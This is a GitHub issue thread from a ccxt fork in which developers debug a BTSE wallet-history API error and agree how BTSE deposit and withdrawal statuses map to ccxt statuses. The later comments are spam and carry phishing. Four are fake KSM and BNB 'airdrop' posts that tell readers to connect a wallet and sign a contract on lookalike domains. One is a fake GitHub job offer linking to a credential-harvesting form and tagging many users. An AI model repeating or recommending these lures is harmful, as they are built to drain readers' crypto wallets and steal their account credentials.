### ISSUE TITLE
API - `fetchDeposits` / `fetchTransactions` / `fetchWithdraws`

### ISSUE THREAD

**Issue by sign-in** [chenkaiC4/ccxt#28]
目前用的是 `/user/wallet_history` API，但是昨天晚上突然 API 就一直返回失敗：

```
BadRequest: btse {"code":400,"msg":"BADREQUEST: Error in search wallet history, please check your parameter and try again.","time":1653621886632,"data":null,"success":false}
    at btse.throwExactlyMatchedException (/Users/*/Workspace/github/ccxt/js/base/Exchange.js:648:19)
    at btse.handleErrors (/Users/*/Workspace/github/ccxt/js/btse.js:1692:18)
    at /Users/*/Workspace/github/ccxt/js/base/Exchange.js:725:51
    at processTicksAndRejections (node:internal/process/task_queues:96:5)
    at async timeout (/Users/*/Workspace/github/ccxt/js/base/functions/time.js:203:20)
    at async btse._fetchTransactions (/Users/*/Workspace/github/ccxt/js/btse.js:1586:26)
    at async btse.fetchDeposits (/Users/*/Workspace/github/ccxt/js/btse.js:1603:16)
    at async /Users/*/Workspace/github/ccxt/btse.js:8:15 {
  constructor: [class BadRequest extends ExchangeError]
}
```

參數沒有錯誤。就連不傳任何參數的情況下，還是返回這個錯誤。是不是測試環境出問題了？

**Comment by yuanchenho** [comment]
@sign-in 請問這邊查詢的是 `spot` 還是 `futures` 呢？

**Comment by sign-in** [comment]
目前是 spot，futures 還沒開始開發。

**Comment by yuanchenho** [comment]
@sign-in 這個我們內部還在確認中
稍晚點回覆

**Comment by yuanchenho** [comment]
@sign-in 
看交易紀錄 `tiancaidev` 這個帳號有筆 111 USD 的 deposit 資料內容好像有誤
請問這筆交易是打 api 建立的嗎？

**Comment by sign-in** [comment]
> @sign-in 看交易紀錄 `tiancaidev` 這個帳號有筆 111 USD 的 deposit 資料內容好像有誤 請問這筆交易是打 api 建立的嗎？

我應該沒有建立過，不確定有沒有其他同事有做過這個操作。現在看起來的確是 API 出問題了是吧？

**Comment by yuanchenho** [comment]
@sign-in 是資料面的問題
我們先修整了資料讓 api 能夠通過
api 本身是沒有問題的
請再試試

**Comment by sign-in** [comment]
`status` 為 open 是什麼情況？我看文檔裡面沒有這個 status。ccxt 裡面支持這幾種，應該映射哪一種：

```
'pending',  'ok', 'failed', 'canceled'
```

**Comment by yuanchenho** [comment]
@sign-in  這邊整理一下應該要的映射方式
之後我們也會調整 api 文檔上面的
這邊只列出需要對應到 `ok` `failed` 跟 `cancelled` 的 btse 狀態
剩下的就都預設對應到 `pending` 謝謝

| btse status | ccxt status |
| ---- | --- |
| Completed (10) | ok |
| Expired (14) | failed |
| User Cancelled (16) | cancelled |
| Cancelled (18) | cancelled |
| Check Failed (31) | failed |

**Comment by sign-in** [comment]
所以 `Open` 对应 `pending` 是吧？

**Comment by yuanchenho** [comment]
@sign-in 是
謝謝

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by bajarang-agarwal1** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![Binance Free Tokens](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

## Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Claimed my free tokens on Binance! 🌟 #BinanceFreeTokens #Crypto](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by jorarportal** [comment]
# Binance

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by mepcovenkat97** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
Serenitychic, @kermitsxb, @valtab, @ilovejs, @skudasov, @renlulu, @mizanxali, @NORMANCOMICS, @monleru, @crapthings, @reza2732, @woodbridge, @no-decaf, @0xWarren, @lucylow, @MOR7YYYYY, @nslogx, @zhairuihao, @luis-herasme, @davpal71
